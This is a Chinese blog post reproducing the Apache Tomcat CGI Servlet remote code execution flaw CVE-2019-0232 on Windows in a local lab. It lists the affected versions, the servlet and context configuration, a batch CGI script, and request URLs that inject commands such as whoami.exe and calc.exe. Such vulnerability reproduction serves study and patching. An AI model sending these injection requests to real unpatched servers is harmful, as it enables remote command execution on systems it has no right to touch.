安徽锋刃科技
安徽锋刃科技

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现

前言

该漏洞只对Windows平台有效,攻击者向CGI Servlet发送请求,可在具有Apache Tomcat权限的系统上注入和执行任意操作系统命令。漏洞成因是当将参数从JRE传递到Windows环境时,由于CGI_Servlet中的输入验证错误而存在该漏洞。

 

影响版本

Apache Tomcat 9.0.0.M1 ~ 9.0.17

Apache Tomcat 8.5.0 ~ 8.5.39

Apache Tomcat 7.0.0 ~ 7.0.93

环境搭建

Apache Tomcat安装

下载地址https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.39/

需要取消掉注释两项

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第1张图片

标签中替换掉

 
        cgi
        org.apache.catalina.servlets.CGIServlet
        
          debug
          0
        
        
          cgiPathPrefix
          WEB-INF/cgi-bin
        
        
          executable
          
        
        5

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第2张图片

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第3张图片

接着在conf/context.xml  中的添加privileged="true"语句

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第4张图片

apache-tomcat-8.5.39\webapps\ROOT\WEB-INF下创建一个cgi-bin文件夹,并在文件夹内创建一个bat文件写入

@echo off
echo Content-Type: text/plain
echo.
set off=%~1
%off%

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第5张图片

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第6张图片

现在就可以启动了,已经有漏洞环境的环境了

双击startup.bat后访问127.0.0.1:8080

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第7张图片

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第8张图片

执行命令

http://your-IP:8080/cgi-bin/hello.bat?c:/windows/system32/whoami.exe

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第9张图片

弹计算器

http://your-IP:8080/cgi-bin/hello.bat?c:/windows/system32/calc.exe

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_第10张图片

 

你可能感兴趣的:(CVE-2019-0232)

  • CVE-2019-0232:Apache Tomcat RCE复现 jun123123
    漏洞影响范围ApacheTomcat9.0.0.M1to9.0.17ApacheTomcat8.5.0to8.5.39ApacheTomcat7.0.0to7.0.93利用前提Windows系统启用CGIServlet和enableCmdLineArguments参数privileged="true"复现过程配置java环境变量下载相应版本tomcat服务器(此处为9.0.13版本)下载地址打开配
  • Apache Tomcat(CVE-2019-0232)远程代码执行漏洞复现 5f4120c4213b
    0x00简介Tomcat服务器是一个免费的开放源代码的Web应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache服务器的扩展,但运行时它是独立运行的,所以当你运
  • 【系统安全】Apache Tomcat 漏洞修复 [email protected] Linux故障解决
    一、ApacheTomcat远程代码执行漏洞(CVE-2019-0232)Affects:7.0.0to7.0.93ApacheTomacat官网:ApacheTomcat®-ApacheTomcat7vulnerabilitiesRedHatBugzilla:1701056–(CVE-2019-0232)CVE-2019-0232tomcat:RemoteCodeExecutiononWindo
  • Tomcat中间件漏洞汇总 安全混子 渗透web安全中间件tomcat
    目录一、Tomcat是什么?二、安装三、目录结构四、任意文件写入(CVE-2017-12615五、远程代码执行(CVE-2019-0232六、War后门文件部署一、Tomcat是什么?Tomcat是Apache软件基金会(ApacheSoftwareFoundation)的Jakarta项目中的一个核心项目,由Apache、Sun和其他一些公司及个人共同开发而成。由于有了Sun的参与和支持,最新的
  • Tomcat漏洞总结复现 1ance. 漏洞复现tomcat
    目录简介Tomcat目录结构及介绍CVE-2017-12615漏洞描述漏洞原理影响范围复现过程修复参考CVE-2020-1938漏洞描述漏洞原理影响范围复现过程修复参考CVE-2019-0232漏洞描述漏洞原理影响范围复现过程修复参考Tomcat8弱口令+war包部署漏洞描述影响范围复现过程修复简介Tomcat是Apache软件基金会(ApacheSoftwareFoundation)的Jakar
  • 常见中间件——Tomcat漏洞复现分析 空白行 漏洞复现tomcat中间件java
    文章目录Tomcat任意文件写入(CVE-2017-12615)漏洞本质原因jsp木马绕过方式:修复建议Tomcat远程代码执行(CVE-2019-0232)漏洞本质修复建议Tomcat文件包含漏洞(CVE-2020-1938)漏洞本质修复建议Tomcat+弱口令&&后台getshell漏洞修复建议转载Tomcat任意文件写入(CVE-2017-12615)影响范围:Tomcat7.0.0-7.0
  • CVE-2019-0232:Apache Tomcat远程代码执行漏洞分析 看雪学院
    漏洞背景2019年4月13号,ApacheTomcat9.0.18版本公告中提到,本次更新修复了一个代号为CVE-2019-0232的漏洞。该漏洞只对Windows平台有效,攻击者向CGIServlet发送一个精心设计的请求,可在具有ApacheTomcat权限的系统上注入和执行任意操作系统命令。漏洞成因是当将参数从JRE传递到Windows环境时,由于CGI_Servlet中的输入验证错误而存在
  • 中间件安全基础(二)Tomcat & jBoss YoungBoy啊啊啊 web安全
    目录前言:正文中间件——Tomcat1.Tomcat简介2.Tomcat漏洞0x01.Tomcat任意文件写入(CVE-2017-12615)0x02.Tomcat远程代码执行(CVE-2019-0232)0x03.Tomcat+弱口令&&后台getshell漏洞0x04:TomcatmanagerApp暴力破解中间件——Jboss1.Jboss简介2.Windows下Jboss安装3.Jboss
  • Apache Tomcat 8.5.40 与 7.0.94 发布 cpongo4'"\?;@
    开发四年只会写业务代码,分布式高并发都不会还做程序员?>>>ApacheTomcat8.5.40与7.0.94发布了,其中8.5.40自8.5.39以来的显着变化包括:修复Windows上的远程代码执行漏洞CVE-2019-0232。JSP编译器支持Java11。各种NIO2稳定性改进详情查看更新日志:http://tomcat.apache.org/tomcat-8.5-doc/changelo
  • Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现 安徽锋刃科技 CVE-2019-0232
    前言该漏洞只对Windows平台有效,攻击者向CGIServlet发送请求,可在具有ApacheTomcat权限的系统上注入和执行任意操作系统命令。漏洞成因是当将参数从JRE传递到Windows环境时,由于CGI_Servlet中的输入验证错误而存在该漏洞。影响版本ApacheTomcat9.0.0.M1~9.0.17ApacheTomcat8.5.0~8.5.39ApacheTomcat7.0.
  • Apache - Tomcat 漏洞集合 Beret-81 中间件安全Tomcat
    Apache-Tomcat漏洞集合1、Apache-Tomcat-Ajp文件包含漏洞(CVE-2020-1938)1、漏洞描述2、漏洞编号3、影响范围4、漏洞复现2、ApacheTomcat远程代码执行漏洞(CVE-2019-0232)1、漏洞描述2、漏洞编号3、影响范围4、漏洞复现3、ApacheTomcat远程代码执行漏洞(CVE-2017-12615)1、漏洞描述2、漏洞编号3、影响范围4、
  • Linux进程跟踪:以CVE-2019-0232为例 caiqiiqi javaLinux-Unix
    strace-F-evfork,execvejavaMainpublicclassMain{publicstaticvoidmain(String[]args)throwsException{String[]cmd={"./arg.sh","arg","&","dir"};Runtime.getRuntime().exec(cmd);}}参数解释:-F:Tracechildprocessesast
  • cve-2019-0232Apache Tomcat远程代码执行漏洞打开计算器 anlalu233 cve复现
    一、漏洞简介1.漏洞编号和级别CVE编号:CVE-2019-0232,危险级别:高危,CVSS分值:官方未评定。2.漏洞概述ApacheTomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServerPage(JSP)的支持。4月11日,Apache官方发布通告称将在最新版本中修复一个远程代码执行漏洞(CVE-2019-0232),
  • Tomcat CGIServlet enableCmdLineArguments远程代码执行_CVE-2019-0232漏洞复现 WY92139010
    TomcatCGIServletenableCmdLineArguments远程代码执行_CVE-2019-0232漏洞复现一、漏洞描述该漏洞是由于tomcatCGI将命令行参数传递给Windows程序的方式存在错误,使得CGIServlet被命令注入影响。成功利用此漏洞可允许远程攻击者在目标服务器上执行任意命令,从而导致服务器被完全控制。该漏洞只影响windows平台,要求启用CGIServle
  • CVE-2019-0232 Apache Tomcat远程任意代码执行漏洞复现及复现过程中遇到的问题 Trickery_Src 漏洞复现
    CVE编号:CVE-2019-0232威胁等级:高危漏洞背景2019年4月13号,ApacheTomcat9.0.18版本公告中提到,本次更新修复了一个代号为CVE-2019-0232的漏洞。该漏洞只对Windows平台有效,攻击者向CGIServlet发送一个精心设计的请求,可服务端注入和执行任意操作系统命令。影响范围:ApacheTomcat9.0.0.M1to9.0.17ApacheTomc
  • CVE-2019-0232(TOMCAT远程代码执行)漏洞复现 安全小菜鸟 kali
    一、漏洞简介2019年4月13号,ApacheTomcat9.0.18版本公告中提到,本次更新修复了一个代号为CVE-2019-0232的漏洞。该漏洞只对Windows平台有效,ApacheTomcat9.0.0.M1到9.0.17,8.5.0到8.5.39和7.0.0到7.0.93中的CGIServlet很容易受到远程执行代码的影响,攻击者向CGIServlet发送一个精心设计的请求,可在具有A
  • CVE-2019-0232:Apache Tomcat RCE漏洞 systemino
    ApacheTomcat是在ApacheSoftwareFoundation(ASF)支持下开发的开源JavaServlet容器,实现了多个JavaEE规范,包括JavaServlet,JavaServerPages(JSP),JavaExpressionLanguage(EL),WebSocket,提供一个Java代码运行的纯JavaHTTPweb服务器环境。4月15日,NightwatchCy
  • Apache Tomcat CVE-2019-0232 远程代码执行漏洞 捡垃圾的小弟弟
    2019年4月10日,ApacheTomcat报告了一个漏洞称在windows上运行的ApacheTomcat存在远程代码执行漏洞,漏洞编号为CVE-2019-0232。在Windows平台,远程攻击者向CGIServlet发送一个精心设计的请求,在具有ApacheTomcat权限的系统上注入和执行任意操作系统命令。漏洞成因是当将参数从JRE传递到Windows环境时,由于CGI_Servlet中
  • CVE-2019-0232漏洞复现 zw1sh
    记录一个cve-2019-0232的漏洞环境搭建的任务1、相关信息2019年4月11日,Apache官方发布通告称将在最新版本中修复一个远程代码执行漏洞(CVE-2019-0232),由于JRE将命令行参数传递给Windows的方式存在错误,会导致CGIServlet受到远程执行代码的攻击。触发该漏洞需要同时满足以下条件:1.系统为Windows2.启用了CGIServlet(默认为关闭)3.启用
  • Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现 PeiSylon 漏洞复现web安全
    ApacheTomcat远程代码执行漏洞(CVE-2019-0232)漏洞复现一、漏洞简介漏洞编号和级别CVE编号:CVE-2019-0232,危险级别:高危,CVSS分值:官方未评定。漏洞概述ApacheTomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServerPage(JSP)的支持。4月11日,Apache官方发布通告称
  • CVE-2019-0232:Apache Tomcat RCE复现 L0ading'blogs
    CVE-2019-0232:ApacheTomcatRCE复现0X00漏洞简介该漏洞是由于TomcatCGI将命令行参数传递给Windows程序的方式存在错误,使得CGIServlet被命令注入影响。该漏洞只影响Windows平台,要求启用了CGIServlet和enableCmdLineArguments参数。但是CGIServlet和enableCmdLineArguments参数默认情况下都
  • CVE-2019-0232:Apache Tomcat RCE复现 L0ading
    CVE-2019-0232:ApacheTomcatRCE复现0X00漏洞简介该漏洞是由于TomcatCGI将命令行参数传递给Windows程序的方式存在错误,使得CGIServlet被命令注入影响。该漏洞只影响Windows平台,要求启用了CGIServlet和enableCmdLineArguments参数。但是CGIServlet和enableCmdLineArguments参数默认情况下都
  • CVE-2019-0232 Tomcat远程代码执行漏洞 vampire_hunter
    该漏洞只存在于Windows下安装ApacheTomcat9.0.0.M1to9.0.17、ApacheTomcat8.5.0to8.5.39、ApacheTomcat7.0.0to7.0.93的Tomcat,由于使用enableCmdLineArguments在Windows上运行时,远程执行代码漏洞(CVE-2019-0232)驻留在公共网关接口(CGI)Servlet中,java运行时环境(
  • Apache Tomcat CVE-2019-0232 远程代码执行漏洞 tdcoming WEB安全漏洞利用
    漏洞简介2019年4月10日,ApacheTomcat报告了一个漏洞,报告中称在windows上运行的ApacheTomcat存在远程代码执行漏洞,漏洞编号为CVE-2019-0232。在Windows平台,远程攻击者向CGIServlet发送一个精心设计的请求,在具有ApacheTomcat权限的系统上注入和执行任意操作系统命令。漏洞成因是当将参数从JRE传递到Windows环境时,由于CGI_
  • Tomcat RCE 漏洞复现(CVE-2019-0232) helloexp poc漏洞
    漏洞影响范围,直接看官方公告:总结起来漏洞影响范围如下:tomcat7.0.04之前tomcat8.5.40之前tomcat9.0.19之前版本都会影响(tomcat服务器版本在受影响范围内的小伙伴可以打一波补丁了)测试环境tomcat版本8.5.31jdk版本8.121漏洞利用前提修改conf里面的内容第一处:context.xml第二处:web.xml修改完上述两处配置文件之后,直接启动服务器
  • 深入浅出Java Annotation(元注解和自定义注解) Josh_Persistence Java Annotation元注解自定义注解
    一、基本概述        Annontation是Java5开始引入的新特征。中文名称一般叫注解。它提供了一种安全的类似注释的机制,用来将任何的信息或元数据(metadata)与程序元素(类、方法、成员变量等)进行关联。     更通俗的意思是为程序的元素(类、方法、成员变量)加上更直观更明了的说明,这些说明信息是与程序的业务逻辑无关,并且是供指定的工具或
  • mysql优化特定类型的查询 annan211 java工作mysql
    本节所介绍的查询优化的技巧都是和特定版本相关的,所以对于未来mysql的版本未必适用。 1 优化count查询 对于count这个函数的网上的大部分资料都是错误的或者是理解的都是一知半解的。在做优化之前我们先来看看 真正的count()函数的作用到底是什么。 count()是一个特殊的函数,有两种非常不同的作用,他可以统计某个列值的数量,也可以统计行数。 在统
  • MAC下安装多版本JDK和切换几种方式 棋子chessman jdk
    环境: MAC AIR,OS X 10.10,64位   历史: 过去 Mac 上的 Java 都是由 Apple 自己提供,只支持到 Java 6,并且OS X 10.7 开始系统并不自带(而是可选安装)(原自带的是1.6)。 后来 Apple 加入 OpenJDK 继续支持 Java 6,而 Java 7 将由 Oracle 负责提供。   在终端中输入jav
  • javaScript (1) Array_06 JavaScriptjava浏览器
    JavaScript 1、运算符   运算符就是完成操作的一系列符号,它有七类:   赋值运算符(=,+=,-=,*=,/=,%=,<<=,>>=,|=,&=)、算术运算符(+,-,*,/,++,--,%)、比较运算符(>,<,<=,>=,==,===,!=,!==)、逻辑运算符(||,&&,!)、条件运算(?:)、位
  • 国内顶级代码分享网站 袁潇含 javajdkoracle.netPHP
           现在国内很多开源网站感觉都是为了利益而做的                  当然利益是肯定的,否则谁也不会免费的去做网站      &
  • Elasticsearch、MongoDB和Hadoop比较 随意而生 mongodbhadoop搜索引擎
      IT界在过去几年中出现了一个有趣的现象。很多新的技术出现并立即拥抱了“大数据”。稍微老一点的技术也会将大数据添进自己的特性,避免落大部队太远,我们看到了不同技术之间的边际的模糊化。假如你有诸如Elasticsearch或者Solr这样的搜索引擎,它们存储着JSON文档,MongoDB存着JSON文档,或者一堆JSON文档存放在一个Hadoop集群的HDFS中。你可以使用这三种配
  • mac os 系统科研软件总结 张亚雄 mac os
    1.1 Microsoft Office for Mac 2011      大客户版,自行搜索。      1.2 Latex (MacTex):      系统环境:https://tug.org/mactex/     &nb
  • Maven实战(四)生命周期 AdyZhang maven
    1. 三套生命周期     Maven拥有三套相互独立的生命周期,它们分别为clean,default和site。 每个生命周期包含一些阶段,这些阶段是有顺序的,并且后面的阶段依赖于前面的阶段,用户和Maven最直接的交互方式就是调用这些生命周期阶段。 以clean生命周期为例,它包含的阶段有pre-clean, clean 和 post
  • Linux下Jenkins迁移 aijuans Jenkins
    1. 将Jenkins程序目录copy过去      源程序在/export/data/tomcatRoot/ofctest-jenkins.jd.com下面            tar -cvzf jenkins.tar.gz ofctest-jenkins.jd.com &
  • request.getInputStream()只能获取一次的问题 ayaoxinchao requestInputstream
    问题:在使用HTTP协议实现应用间接口通信时,服务端读取客户端请求过来的数据,会用到request.getInputStream(),第一次读取的时候可以读取到数据,但是接下来的读取操作都读取不到数据   原因: 1. 一个InputStream对象在被读取完成后,将无法被再次读取,始终返回-1; 2. InputStream并没有实现reset方法(可以重
  • 数据库SQL优化大总结之 百万级数据库优化方案 BigBird2012 SQL优化
    网上关于SQL优化的教程很多,但是比较杂乱。近日有空整理了一下,写出来跟大家分享一下,其中有错误和不足的地方,还请大家纠正补充。 这篇文章我花费了大量的时间查找资料、修改、排版,希望大家阅读之后,感觉好的话推荐给更多的人,让更多的人看到、纠正以及补充。 1.对查询进行优化,要尽量避免全表扫描,首先应考虑在 where 及 order by 涉及的列上建立索引。 2.应尽量避免在 where
  • jsonObject的使用 bijian1013 javajson
            在项目中难免会用java处理json格式的数据,因此封装了一个JSONUtil工具类。 JSONUtil.java package com.bijian.json.study; import java.util.ArrayList; import java.util.Date; import java.util.HashMap;
  • [Zookeeper学习笔记之六]Zookeeper源代码分析之Zookeeper.WatchRegistration bit1129 zookeeper
    Zookeeper类是Zookeeper提供给用户访问Zookeeper service的主要API,它包含了如下几个内部类     首先分析它的内部类,从WatchRegistration开始,为指定的znode path注册一个Watcher,   /** * Register a watcher for a particular p
  • 【Scala十三】Scala核心七:部分应用函数 bit1129 scala
    何为部分应用函数? Partially applied function: A function that’s used in an expression and that misses some of its arguments.For instance, if function f has type Int => Int => Int, then f and f(1) are p
  • Tomcat Error listenerStart 终极大法 ronin47 tomcat
    Tomcat报的错太含糊了,什么错都没报出来,只提示了Error listenerStart。为了调试,我们要获得更详细的日志。可以在WEB-INF/classes目录下新建一个文件叫logging.properties,内容如下 Java代码  handlers = org.apache.juli.FileHandler, java.util.logging.ConsoleHa
  • 不用加减符号实现加减法 BrokenDreams 实现
            今天有群友发了一个问题,要求不用加减符号(包括负号)来实现加减法。         分析一下,先看最简单的情况,假设1+1,按二进制算的话结果是10,可以看到从右往左的第一位变为0,第二位由于进位变为1。    
  • 读《研磨设计模式》-代码笔记-状态模式-State bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /* 当一个对象的内在状态改变时允许改变其行为,这个对象看起来像是改变了其类 状态模式主要解决的是当控制一个对象状态的条件表达式过于复杂时的情况 把状态的判断逻辑转移到表示不同状态的一系列类中,可以把复杂的判断逻辑简化 如果在
  • CUDA程序block和thread超出硬件允许值时的异常 cherishLC CUDA
    调用CUDA的核函数时指定block 和 thread大小,该大小可以是dim3类型的(三维数组),只用一维时可以是usigned int型的。 以下程序验证了当block或thread大小超出硬件允许值时会产生异常!!!GPU根本不会执行运算!!! 所以验证结果的正确性很重要!!! 在VS中创建CUDA项目会有一个模板,里面有更详细的状态验证。 以下程序在K5000GPU上跑的。
  • 诡异的超长时间GC问题定位 chenchao051 jvmcmsGChbaseswap
    HBase的GC策略采用PawNew+CMS, 这是大众化的配置,ParNew经常会出现停顿时间特别长的情况,有时候甚至长到令人发指的地步,例如请看如下日志: 2012-10-17T05:54:54.293+0800: 739594.224: [GC 739606.508: [ParNew: 996800K->110720K(996800K), 178.8826900 secs] 3700
  • maven环境快速搭建 daizj 安装mavne环境配置
    一 下载maven 安装maven之前,要先安装jdk及配置JAVA_HOME环境变量。这个安装和配置java环境不用多说。 maven下载地址:http://maven.apache.org/download.html,目前最新的是这个apache-maven-3.2.5-bin.zip,然后解压在任意位置,最好地址中不要带中文字符,这个做java 的都知道,地址中出现中文会出现很多
  • PHP网站安全,避免PHP网站受到攻击的方法 dcj3sjt126com PHP
    对于PHP网站安全主要存在这样几种攻击方式:1、命令注入(Command Injection)2、eval注入(Eval Injection)3、客户端脚本攻击(Script Insertion)4、跨网站脚本攻击(Cross Site Scripting, XSS)5、SQL注入攻击(SQL injection)6、跨网站请求伪造攻击(Cross Site Request Forgerie
  • yii中给CGridView设置默认的排序根据时间倒序的方法 dcj3sjt126com GridView
    public function searchWithRelated() {         $criteria = new CDbCriteria;         $criteria->together = true; //without th
  • Java集合对象和数组对象的转换 dyy_gusi java集合
        在开发中,我们经常需要将集合对象(List,Set)转换为数组对象,或者将数组对象转换为集合对象。Java提供了相互转换的工具,但是我们使用的时候需要注意,不能乱用滥用。 1、数组对象转换为集合对象     最暴力的方式是new一个集合对象,然后遍历数组,依次将数组中的元素放入到新的集合中,但是这样做显然过
  • nginx同一主机部署多个应用 geeksun nginx
    近日有一需求,需要在一台主机上用nginx部署2个php应用,分别是wordpress和wiki,探索了半天,终于部署好了,下面把过程记录下来。 1.   在nginx下创建vhosts目录,用以放置vhost文件。 mkdir vhosts   2.   修改nginx.conf的配置, 在http节点增加下面内容设置,用来包含vhosts里的配置文件 #
  • ubuntu添加admin权限的用户账号 hongtoushizi ubuntuuseradd
    ubuntu创建账号的方式通常用到两种:useradd 和adduser . 本人尝试了useradd方法,步骤如下: 1:useradd    使用useradd时,如果后面不加任何参数的话,如:sudo useradd sysadm 创建出来的用户将是默认的三无用户:无home directory ,无密码,无系统shell。 顾应该如下操作:  
  • 第五章 常用Lua开发库2-JSON库、编码转换、字符串处理 jinnianshilongnian nginxlua
      JSON库   在进行数据传输时JSON格式目前应用广泛,因此从Lua对象与JSON字符串之间相互转换是一个非常常见的功能;目前Lua也有几个JSON库,本人用过cjson、dkjson。其中cjson的语法严格(比如unicode \u0020\u7eaf),要求符合规范否则会解析失败(如\u002),而dkjson相对宽松,当然也可以通过修改cjson的源码来完成
  • Spring定时器配置的两种实现方式OpenSymphony Quartz和java Timer详解 yaerfeng1989 timerquartz定时器
    原创整理不易,转载请注明出处:Spring定时器配置的两种实现方式OpenSymphony Quartz和java Timer详解 代码下载地址:http://www.zuidaima.com/share/1772648445103104.htm 有两种流行Spring定时器配置:Java的Timer类和OpenSymphony的Quartz。 1.Java Timer定时 首先继承jav
  • Linux下df与du两个命令的差别? pda158 linux
     一、df显示文件系统的使用情况,与du比較,就是更全盘化。   最经常使用的就是 df -T,显示文件系统的使用情况并显示文件系统的类型。   举比例如以下:   [root@localhost ~]# df -T   Filesystem                   Type &n
  • [转]SQLite的工具类 ---- 通过反射把Cursor封装到VO对象 ctfzh VOandroidsqlite反射Cursor
    在写DAO层时,觉得从Cursor里一个一个的取出字段值再装到VO(值对象)里太麻烦了,就写了一个工具类,用到了反射,可以把查询记录的值装到对应的VO里,也可以生成该VO的List。   使用时需要注意: 考虑到Android的性能问题,VO没有使用Setter和Getter,而是直接用public的属性。 表中的字段名需要和VO的属性名一样,要是不一样就得在查询的SQL中
  • 该学习笔记用到的Employee表 vipbooks oraclesql工作
        这是我在学习Oracle是用到的Employee表,在该笔记中用到的就是这张表,大家可以用它来学习和练习。 drop table Employee; -- 员工信息表 create table Employee( -- 员工编号 EmpNo number(3) primary key, -- 姓
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他